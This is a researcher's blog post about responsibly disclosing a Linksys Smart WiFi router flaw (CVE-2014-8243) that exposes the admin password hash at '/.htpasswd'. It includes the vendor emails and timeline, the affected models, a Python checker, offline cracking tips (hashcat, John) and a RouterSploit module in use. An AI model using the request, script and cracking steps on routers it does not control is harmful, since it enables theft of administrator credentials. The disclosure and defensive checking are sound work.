Password hash disclosure in Linksys Smart WiFi routers

This is my tale about reporting a specific security vulnerability in a major product, just to give some insight in how responsible disclosures are handled by a security researcher (me) and various software companies (Cisco, Linksys and Belkin).

On May 17, 2013 I found a severe password hash disclosure in a Cisco Linksys EA6700 router, a Linksys Smart WiFi router that at the time was the top model Linksys had to offer consumers.

I performed a security assessment of the router and immediately spotted a weakness. I requested the ‘/.htpasswd’ file from the router's web server:

GET /.htpasswd HTTP/1.1
Host: 172.10.20.1

The server sent the following HTTP response:

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 41
Date: Fri, 17 May 2013 18:47:36 GMT
Server: lighttpd/1.4.28

admin:$1$3Eb757jl$zFM3Mtk8Qmkp3kjbRukUq/

Apart from the version number disclosure in the ‘Server’ HTTP header, I immediately saw the password hash of the user ‘admin’. The ‘$1$’ prefix marks it as an md5crypt hash, the salted MD5-based crypt(3) scheme.

Disclosure of a password hash is a common security vulnerability; it falls into the category ‘key management errors’, registered as CWE-320.

Fortunately I had admin access to this router, so I changed the administrator password to see whether this would result in a different hash in ‘/.htpasswd’. It did, which confirmed that the disclosure was a true positive: the file being served tracks the live administrator credential.

In my job as a security penetration tester I find (severe) security vulnerabilities all the time in many very well-known commercial off-the-shelf software products. Most of the time I don't feel like reporting them. Reporting vulnerabilities responsibly to a company that doesn't know you is an unpaid, time-consuming and dirty job with all kinds of legal risks attached. Most companies don't like security researchers: they find them annoying.

It didn't feel right to leave this specific vulnerability unreported, so on October 24, 2013 I disclosed it to the Cisco Product Security Incident Response Team in a quickly written e-mail:

From: Sijmen Ruwhof
Sent: Thursday, October 24, 2013 15:12
To: psirt at cisco.com
Subject: Password hash disclosure vulnerability in Cisco Linksys AE6700
Priority: High

Hi security team,

I’ve found an administrator password hash disclosure vulnerability in Cisco Linksys AE6700, and probably on all other routers using the same firmware. This finding is actually really simple: you can retrieve the password hash by performing an HTTP request to /.htpasswd on the router login page.

Can you confirm my finding?

Thanks,

Sijmen Ruwhof

My report was read almost immediately and I got a quick response:

From: [..] [mailto:[..]@cisco.com]
Sent: Thursday, October 24, 2013 8:27 AM
To: Sijmen Ruwhof; psirt at cisco.com; security
Subject: Re: Password hash disclosure vulnerability in Cisco Linksys AE6700

Sijmen:

Hi there. This is [..] with the Cisco PSIRT – Product Security Incident Response Team.

On March 15, 2013, Belkin completed the acquisition of Linksys – so any vulnerability reports on Linksys products should be handled by the Belkin Incident Response Team, which I’m cc’ing here.

As Linksys and Cisco are now two separate companies, it isn’t appropriate for us to know the details of any vulnerability affecting a Belkin/Linksys device – so I would ask you to please remove us from the CC list of any additional emails you may exchange with the Linksys/Belkin IRT.

Thanks for contacting the Cisco PSIRT

[..]

I didn't know that Linksys had been bought by Belkin. The product I tested was branded as ‘Cisco Linksys EA6700’. Perhaps old packaging.

Belkin also responded quickly:

From: [..] [mailto:[..]@belkin.com]
Sent: Thursday October 24 2013 17:40
To: Sijmen Ruwhof; security
CC: [..]
Subject: RE: Password hash disclosure vulnerability in Cisco Linksys AE6700

Hello Sijmen

We will need a number of data points from you. I am assuming you are speaking of the EA6700? As there is no AE6700. What is the serial number of the router you tested with? What firmware version are you on… i.e. version & build…

From your statement it appears to be simple but please provide a step by step on how you discovered this vulnerability.

Regards,

[..]
Customer Support Engineer

My reply:

From: Sijmen Ruwhof
Sent: Friday, October 25, 2013 02:25
To: [..]; ‘security’
CC: [..]
Subject: RE: Password hash disclosure vulnerability in Linksys EA6700

Hi [..],

The correct product name is indeed Linksys EA6700. The serial number of the device is 1371060[..]. Information about the firmware version is unknown at this moment.

I’ve discovered the vulnerability when performing a security vulnerability assessment on the router, before placing it into a production network.

Reproduction: When you visit the address ‘http://ipAddressOfTheRouter/.htpasswd’ then a password hash is displayed.

I hope that I have supplied you with enough information to start confirming the issue.

Kind regards,

Sijmen Ruwhof

At that time I didn't have access to the router, so I couldn't log into it and give them the firmware version number. Belkin still wanted that number:

From: [..] [mailto:[..]@belkin.com]
Sent: Friday, October 25, 2013 21:11
To: Sijmen Ruwhof; security
CC: [..]
Subject: RE: Password hash disclosure vulnerability in Linksys EA6700

Hello Sijmen

We have opened a case on your report. CASE 01227697. Our product team will look into your issue but in the meantime please provide the firmware version you tested when able. That is an important piece of info we still need.

Regards,

[..]
Customer Support Engineer

Great, they opened a case to research the vulnerability. I figured the firmware version number was nice to know, but not mandatory for them to start investigating: Linksys Smart WiFi routers are configured to update themselves automatically, so the vulnerability was present in the latest firmware version. And if you disclose a severe security vulnerability, you would assume that they take immediate action. I think I was wrong:

From: support at linksys.com [mailto:support at linksys.com]
Sent: Friday, December 13, 2013 17:10
To: sijmen at secundity.com
Subject: Security Mailer Report_Password hash disclosure vulnerability in Linksys EA6700 [ ref:_00D306e4T._50080RlJr6:ref ]

Hello Sijmen

We still need the firmware version and build you tested with. Please advise when able.

Regards

[..]
Sustaining Engineer

Because of a very busy schedule, I didn't respond until February 2, 2014:

From: Sijmen Ruwhof
Sent: Sunday, February 2, 2014 22:11
To: ‘support at linksys.com’
Subject: RE: Security Mailer Report_Password hash disclosure vulnerability in Linksys EA6700 [ ref:_00D306e4T._50080RlJr6:ref ]

Hi [..],

I finally had access to the router again, so now I’m able to provide you with the additional details.

The EA6700 router’s firmware version is 1.1.40.153731

Kind regards,

Sijmen Ruwhof

Linksys didn't reply to my e-mail, so I was curious whether they had started their investigation and sent them a reminder. A quick test showed that the vulnerability was still unpatched in the router, so perhaps they had forgotten about it?

From: Sijmen Ruwhof
Sent: Tuesday, May 20, 2014 14:08
To: ‘support at linksys.com’
Subject: RE: Security Mailer Report_Password hash disclosure vulnerability in Linksys EA6700 [ ref:_00D306e4T._50080RlJr6:ref ]

Hi [..],

Did you receive my mail below? Is the vulnerability patched? Or is the bug still in ‘waiting on confirmation’ status?

Thanks,

Sijmen Ruwhof

Linksys and Belkin never answered the last two e-mails I sent them. That feels ungrateful. As a security researcher you take the time and effort to make their products better, and you even disclose the matter responsibly, but a final follow-up is too much to ask. I didn't even get a ‘thank you’ t-shirt 🙁

Today I read on the US-CERT web site (part of the Department of Homeland Security) that they have finally fixed the issue. The vulnerability I found is also registered as CVE-2014-8243. That registration is slightly imprecise: it describes the disclosed value as an MD5 hash, whereas the ‘$1$’ prefix identifies it as an md5crypt hash (the salted, iterated MD5-based crypt(3) scheme), not a bare MD5 digest.

At this moment the latest firmware for the Linksys EA6700 is version 1.1.40 build 160989. I just tested this firmware and they seem to have fixed the issue. That's good: when requesting ‘/.htpasswd’ the web server now returns a ‘404 – Page Not Found’ error.
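A small checker for the two behaviours described in this post, the vulnerable ‘200 OK’ carrying an htpasswd line and the patched ‘404’, written for this page as an added example; it is not part of the original post and not Linksys’ or lucyoa’s code. It uses only Python's standard library. The sample responses are constructed from the request/response shown earlier, the scheme table identifies the ‘$1$’ prefix as md5crypt, and the ‘inconclusive’ verdict guards against routers whose login page answers every path with a 200.

```python
"""Checker for the Linksys Smart Wi-Fi '/.htpasswd' disclosure.

Added example for this page; not Linksys' code and not the RouterSploit
module. Uses only the standard library. The sample responses below are
constructed from the request/response shown in the post.
"""
import re
import sys
import urllib.error
import urllib.request

# One htpasswd line is "<user>:<hash>"; comments and blank lines are ignored.
HTPASSWD_LINE = re.compile(r"^(?P<user>[^:\s]+):(?P<hash>\S+)$")

# crypt(3)/htpasswd prefixes and the scheme they identify. The router's
# "$1$" line is md5crypt (salted, 1000-round MD5-based crypt), which is
# what the CVE loosely calls an "MD5 hash"; it is not a bare MD5 digest.
SCHEMES = [
    ("$apr1$", "apr1 (Apache md5crypt variant)"),
    ("$1$", "md5crypt (MD5-based crypt, 1000 rounds)"),
    ("$2a$", "bcrypt"),
    ("$2b$", "bcrypt"),
    ("$2y$", "bcrypt"),
    ("$5$", "sha256crypt"),
    ("$6$", "sha512crypt"),
    ("{SHA}", "unsalted SHA-1 (base64)"),
]
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")


def classify_hash(h):
    """Name the hashing scheme of one htpasswd hash string."""
    for prefix, name in SCHEMES:
        if h.startswith(prefix):
            return name
    if DES_CRYPT.match(h):
        return "traditional DES crypt"
    return "unknown"


def parse_htpasswd(body):
    """Parse htpasswd text into {user: hash}."""
    creds = {}
    for line in body.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = HTPASSWD_LINE.match(line)
        if m:
            creds[m.group("user")] = m.group("hash")
    return creds


def assess(status, body):
    """Turn one response to GET /.htpasswd into a verdict.

    Returns (verdict, creds): "vulnerable" when the body holds at least
    one user:hash line (the pre-patch behaviour), "fixed" on 404 (the
    build 160989 behaviour) and "inconclusive" otherwise, e.g. a 200
    from a login page that answers every path. A bare status code is
    therefore never trusted on its own.
    """
    if status == 404:
        return "fixed", {}
    if status == 200:
        creds = parse_htpasswd(body)
        if creds:
            return "vulnerable", creds
    return "inconclusive", {}


def probe(target, timeout=5.0):
    """GET http://<target>/.htpasswd and return (status, body_text)."""
    req = urllib.request.Request(
        "http://%s/.htpasswd" % target,
        headers={"User-Agent": "htpasswd-disclosure-check"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # 404 and other error statuses land here
        return err.code, err.read().decode("utf-8", "replace")


def report(status, body):
    """Human-readable summary of assess() plus the scheme of each hash."""
    verdict, creds = assess(status, body)
    lines = ["verdict: %s" % verdict]
    for user, h in creds.items():
        lines.append("  %s -> %s [%s]" % (user, h, classify_hash(h)))
    return "\n".join(lines)


# Constructed samples: the vulnerable body reuses the hash line shown in
# the post; the fixed body is the post-patch 404 page text.
VULNERABLE_BODY = "admin:$1$3Eb757jl$zFM3Mtk8Qmkp3kjbRukUq/\n"
FIXED_BODY = "404 - Page Not Found"

if __name__ == "__main__":
    if len(sys.argv) > 1:            # python3 check_htpasswd.py 192.168.1.1
        print(report(*probe(sys.argv[1])))
    else:                            # offline demo on the constructed samples
        print(report(200, VULNERABLE_BODY))
        print(report(404, FIXED_BODY))
```

Run it with a target (python3 check_htpasswd.py 192.168.1.1) to probe a device on your own network, or with no arguments to see the verdicts for the constructed samples. A recovered ‘$1$’ hash is an offline cracking target: md5crypt is salted but only 1000 MD5 rounds, so hashcat mode 500 or John the Ripper's md5crypt format exhausts a wordlist quickly. Treat any such disclosure as a compromised administrator credential and rotate the password after patching.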

I wondered whether they had reflected the security fix in their release notes:

Firmware version: 1.1.40 (build 160989)
Release date: May 30, 2014

– Integration of BSP 6.37.14.62
– Updated libupnp to v1.6 to address a security vulnerability

=============================================

Firmware version: 1.1.40 (build 153731)
Release date: October 16, 2013

– Internet Explorer 11 support
– Fixes issue where inappropriate “Internet Connection is Down” error appears after router reboot or setup
– Translation improvements in several languages

=============================================

Firmware version: 1.1.38 (Build 149770)
Release date: March 20, 2013
[..]

They only mention a fixed security vulnerability in ‘libupnp’ in firmware version 1.1.40 (build 160989). If you read libupnp's changelog, you will find that libupnp did not fix a password disclosure vulnerability, and it is unlikely that this disclosure was caused by libupnp in the first place: the file was served by lighttpd, the router's web server, not by the UPnP stack. So Linksys chose to fix the issue silently. That's neither fair nor transparent.

Looking at the timeline, Linksys released the patch on May 30, 2014. I disclosed the vulnerability on October 24, 2013, so it took them 218 days to fix it. Quite a long time for such a severe security vulnerability (!).

Vulnerable devices

The following devices are confirmed vulnerable to the password hash disclosure (firmware older than the listed build is affected):

  • Linksys EA2700 < Ver.1.1.40 (Build 162751)
  • Linksys EA3500 < Ver.1.1.40 (Build 162464)
  • Linksys E4200v2 < Ver.2.1.41 (Build 162351)
  • Linksys EA4500 < Ver.2.1.41 (Build 162351)
  • Linksys EA6200 < Ver.1.1.41 (Build 162599)
  • Linksys EA6300 < Ver.1.1.40 (Build 160989)
  • Linksys EA6400 < Ver.1.1.40 (Build 160989)
  • Linksys EA6500 < Ver.1.1.40 (Build 160989)
  • Linksys EA6700 < Ver.1.1.40 (Build 160989)
  • Linksys EA6900 < Ver.1.1.42 (Build 161129)

Update April 3, 2017

GitHub user ‘lucyoa’ committed exploit code for the password disclosure vulnerability as a RouterSploit module (the ‘rsf’ prompt below). If the given target is vulnerable, the hashed administrator password is retrieved. Usage of the exploit:

rsf > use exploits/linksys/smartwifi_password_disclosure
rsf (Linksys SMART WiFi Password Disclosure) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target address e.g. http://192.168.1.1
   port       80                   Target Port


rsf (Linksys SMART WiFi Password Disclosure) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (Linksys SMART WiFi Password Disclosure) > run
[*] Running module...

Sites that link to this story

  1. NVD.NIST.gov: CVE-2014-8243 details
  2. CVE.Mitre.org: CVE-2014-8243 details
  3. KB.CERT.org: Vulnerability Note VU#447516
  4. Video: Security Weekly episode 394 (starts at 27:00 minutes)
  5. Github.com: lucyoa: ‘Exploit implementation for Linksys SMART WiFi Password Disclosure vulnerability’

About Sijmen Ruwhof

Independent IT Security Researcher / Ethical Hacker

5 Responses to Password hash disclosure in Linksys Smart WiFi routers

  1. Yorick Koster (via LinkedIn) says:

    Unfortunately a very recognisable story…

  2. Klaas de Bont (via Twitter) says:

    Great story, lousy outcome. Wear this T-shirt to increase your credibility next time? 😉 https://pbs.twimg.com/media/B1cYTF1IQAA9LY3.jpg

  3. Mark Deiss (via LinkedIn) says:

    Well done!

  4. Brian Knopf says:

    Sijmen,
    We reviewed the article documenting your discovery of the vulnerability and the email chain between you and the Support Engineer regarding the EA6700 hash disclosure. At the time, the acquisition of Linksys had just occurred and the process for handling PSIRT issues at Belkin had not been created. We understand your frustration regarding the lack of response and not receiving credit for your discoveries. The Belkin PSIRT process was created after that incident and a few others to make sure that researchers have direct communication with the Application and Product Security team. We created [email protected] and [email protected] as direct communication points for vuln notification. We understand that does not rectify the fact that your discovery was credited to someone else because they sent the disclosure directly to CERT. Unfortunately we do not have access to those old emails from you and the Linksys Support Engineer as they were previously being sent directly to employees on the Support team. The new way we have implemented has the emails going into a shared email account that the entire Application and Product Security team has access to. It’s checked throughout the day and issues are immediately logged and communicated out to engineering, PM, and other teams. We also respond to the researchers directly so they know we are working on it. We appreciate the work that you and other researchers do. We have made sure that the poor response process you experienced previously will not occur again. Additionally, we will be contacting CERT regarding this vulnerability and letting them know you should be credited as the original researcher who discovered it.

    Brian Knopf
    Director of Application and Product Security

    • Hi Brian,

      Good to hear that the security incident process has been improved. Acquisitions always temporarily lower the quality of processes and the internal organisation.

      The other security researcher that did find the vulnerability (Kyle Lovett) contacted me and US CERT and made sure my name is named in the credits of the vulnerability disclosure by US CERT.

      Thanks for your response! That is appreciated.

      Sijmen
